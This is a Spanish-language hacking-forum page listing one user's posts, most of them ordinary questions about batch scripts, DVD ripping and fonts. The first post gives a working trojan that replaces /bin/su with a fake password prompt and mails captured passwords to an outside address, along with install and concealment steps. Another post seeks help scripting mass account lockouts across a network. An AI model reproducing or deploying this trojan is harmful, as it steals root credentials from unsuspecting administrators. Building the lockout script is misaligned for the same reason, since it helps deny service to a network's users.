elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Curso de javascript por TickTack


  Mostrar Temas
Páginas: [1] 2
1  Seguridad Informática / Hacking / Troyanizando "su" en: 11 Octubre 2011, 02:55 am
Creamos un archivo su.sh y colocamos lo siguiente dentro:

Código:
#!/bin/bash
echo -n Password:
stty -echonl -echo
read VAR
echo $VAR | mail morsa@mi-dominio.com.ar
echo
echo su: Authentication failure
stty -echonl echo

Damos permisos de ejecución:

Código:
# chmod a+x su.sh

Luego podemos reemplazarlo por el verdadero su:

Código:
# whereis su
su: /bin/su /usr/share/man/man1/su.1.gz
# mv /bin/su /bin/su.orig
# mv /root/su.sh /bin/su

Luego podemos convertir el script en bash a binario como en el siguiente enlace: http://www.redes-seguridad.com.ar/2011/06/convertir-un-script-en-bash-en-un.html

También podríamos agregar al final del script la invocación del verdadero su, para que no genere ninguna duda, o moverlo nuevamente.

Opiniones, sugerencias?
2  Programación / Scripting / Script backup BAT con 4 archivos de historial en: 15 Enero 2009, 22:29 pm
Hola gente,
Hoy intenté hacer un script en bat para que haga lo siguiente:

Ya tengo hecho un script que backupea semanalmente otros archivos, los comprime y va guardando con el siguiente formato AAAAMMDD, la cuestión es que quiero solamente dentro de la carpeta que los alberga que existan 4 versiones, es decir una para cada semana. Debe ir borrando cuando llega a la 5 versión, la mas vieja.

Llegué a mostrar por pantalla el archivo que debo borrar, pero cuando intento mandarlo a una variable y luego usar del %VARIABLE% no me funciona.

CONCLUISON: Como debo hacer para que la salida de un comando la guarde en la variable de entorno. Y luego borrar el archivo con el nombre que posee esa variable.

A ver si me explico mejor. Por ejemplo tengo por pantalla:
20090115.rar (es la fecha de hoy en formato AAAAMMDD)

Yo quiero almacenar ese numero en una variable y luego borrar el archivo con dicho nombre. Quedando lo siguiente:

Código:
del 20090115.rar

Espero que me haya explicado bien.

Saludos
3  Programación / Scripting / Consultar correo en BATCH en: 31 Marzo 2007, 21:43 pm
Hola muchachos, como andan, estoy tratando de hacer un *.bat que consulte correo mediante telnet, esto es lo que intento hacer:

Código:
telnet ip_servidor 110
user nombre_usuario
pass password_usuario
list
retr 1

La cuestion es que obviamente los comandos siguientes al telnet los ejecuta luego que sierro la conexion al servidor. Como puedo hacer para que los ejecute antes de que se cierre la sesion, algo con los operadores de redireccion? Si es asi no se como hacerlo, podrian ayudarme si a alguien se le ocurre algo.

Muchas gracias..
4  Media / Multimedia / Que debo hacer luego de Ripear??? en: 15 Enero 2006, 14:22 pm
Hola gente ya he ripeado un dvd y me ha generado los archivos: VIDEO_TS.VOB, VTS_01_0.VOB, etc.

Que debo hacer para copiarlos al dvd, directamente creo un iso y pongo todo dentro o debo hacer algun paso intermedio??

Les agradeceria si me dicen pq estoy medio confundido es que hace unos dias me compre la grabadora...

Adios
5  Informática / Software / Que significa simular???? en: 14 Enero 2006, 15:46 pm
Quisiera saber que hace la grabadora realmente cuando se simula una grabacion, se que no se graba el cd, pero que hace???

Verifica que el cd este correcto para grabar, que no tenga errores o verifica los datos a grabar en el???

Se gasta la cabeza lectograbadora al realizar esto??

Otra consulta mas, el lente o como se llame de la grabadora, es el mismo el de cd que el de dvd?? Se gasta uno y despues el otro o los dos simultaneamente???

Gracias
6  Informática / Software / Ripear siempre un DVD??? en: 11 Enero 2006, 20:32 pm
Hola gente quisiera saber si es necesario si o si ripear un dvd aunque entre en el dvd, el ripeo solo es para achicar el dvd o tambien descifra y permite copiarlo, segun entiendo tienen algo para que no se copie asi como asi...

Gracias
Adios
7  Media / Diseño Gráfico / Diseñar tipografia en: 11 Enero 2006, 20:27 pm
Hola gente antes que nada quiero aclarar que no sabia si ponerlo en el foro de MSN o aca, quisiera hacer mi propias fuentes (letras, tipografia) para poner en el nick del msn, se podria hacer o es algo complejo, pido si me podrian orientar, desde ya muchas gracias

Adios
8  Programación / Programación General / Cuanto hay de seguridad en bloquear la contraseña en un numero n de intentos en: 21 Noviembre 2005, 15:31 pm
Hola gente, he leido q es seguro q se bloquee una cuenta de usuario luego de un n numero de intentos de su contraseña para q no utilicen programas como brutalizadores.

Que seguridad tiene esto??? Debido a que puede ser una simple denegacion de servicios a todos los usuarios de una red...

Con esto quiero decir que si un usuario cualquiera tiene todos los todos nombres de logueo de un usuario de una red, podria DESABILITARLOS a todos haciendo un simple FOR de uno a 3 (cantidad de intentos erroneos antes de bloquear)...

Alguien quisiera ayudarme a hacer un programa para hacerlo en linea de comandos de DOS, ya que no suelo tener mucha practica..

Empezaria asi:

1) Pondria todos los logins en un archivo de texto
2) Iria recorriendo ese archivo y por cada usuario ingresar incorrectamente 3 veces la contraseña, luego del tercer intento pasaria al siguiente usuario...
Con linux esto lo haria algo asi FOR i in VAR (donde VAR es el archivo de texto con todos los usuarios)

Pero a que me tendria q loguear por linea de texto para introducir la contraseña???

No se si me explico, bueno espero me ayuden.

Bytes
9  Seguridad Informática / Hacking / Paginas para hackear!!! en: 18 Septiembre 2005, 04:30 am
Se que existen y que hay gente que hace paginas web especialmente para que las hackeen pero sinceramente no conozco ninguna, alguien sabe de alguna?????

creo que habia una que era hackthis o algo asi pero no me acuerdo y esa no entra, realmente sirven o existen????
10  Media / Diseño Gráfico / Como abrir un archivo *.swf para editarlo con flash en: 10 Septiembre 2005, 17:08 pm
Como abrir un archivo *.swf para editarlo con flash ya que leei en algun lado que los guiños del mns estan hechos en flash, consegui uno en este formato pero quiero modificarlo para cambiarlo, gracias...

Si no quisiera saber como hacer un archivo con esa extension...
Páginas: [1] 2
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines